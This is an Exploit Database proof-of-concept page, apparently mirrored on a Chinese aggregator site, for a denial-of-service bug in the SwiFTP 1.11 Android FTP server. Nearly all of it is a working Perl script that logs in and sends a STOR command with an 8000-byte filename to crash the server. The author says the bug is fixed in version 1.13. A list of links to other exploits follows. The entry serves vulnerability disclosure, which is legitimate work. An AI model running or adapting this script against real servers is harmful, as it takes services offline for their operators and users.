SwiFTP 1.11 – Overflow (Denial of Service) (PoC)

Exploit Database
91 阅读

作者： Julien Bedard

日期： 2010-01-13
类别：
- dos
平台：
- hardware
来源：https://www.exploit-db.com/exploits/11125/

# Exploit Title: SwiFTP v1.11 Overflow Dos PoC
# Software Link: http://swiftp.googlecode.com/files/SwiFTP_1.11.apk
# Version: v1.11
# Tested on: Android OS G1 Rogers / Rooted (CyanogenMod-4.0.4)


#!/usr/bin/perl
############
#
# Simple Dos Crap for the Android app : SwiFTP Server v1.11
# by Julien Bedard
#
# This DoS have been patched in the new version that's why
# I'm releasing it. 
#
# SwiFTP Server v1.11 --> Vulnerable
# SwiFTP Server v1.13 --> Patched
#
####################################

use IO::Socket::INET;

$overflow = 'A' x 8000;

$ftpraw=IO::Socket::INET->new("192.168.2.13:2121") or die;

print $ftpraw "user nouser\n";
print $ftpraw "pass nopass\n";
print $ftpraw "stor $overflow\n";
print $ftpraw "QUIT\n";

close $ftpraw;

last Exploits
SwiFTP 1.11 – Overflow (Denial of Service) (PoC)的更多信息

UMPlayer Portable 0.95 – Crash (PoC)：
DCMTK 3.6.0 storescp – Stack Buffer Overflow：
Ipswitch Imail Server – List Mailer Reply-To Address Memory Corruption：
Apple Mac OSX Regex Engine (TRE) – Integer Signedness / Overflow：
XNU Kernel – Heap Overflow Due to Bad Bounds Checking in MPTCP：
MediaTek Wirless Utility rt2870 – Denial of Service (PoC)：
Wireshark – ‘get_t61_string’ Heap Out-of-Bounds Read：
iOS 12.4 – Sandbox Escape due to Integer Overflow in mediaserverd：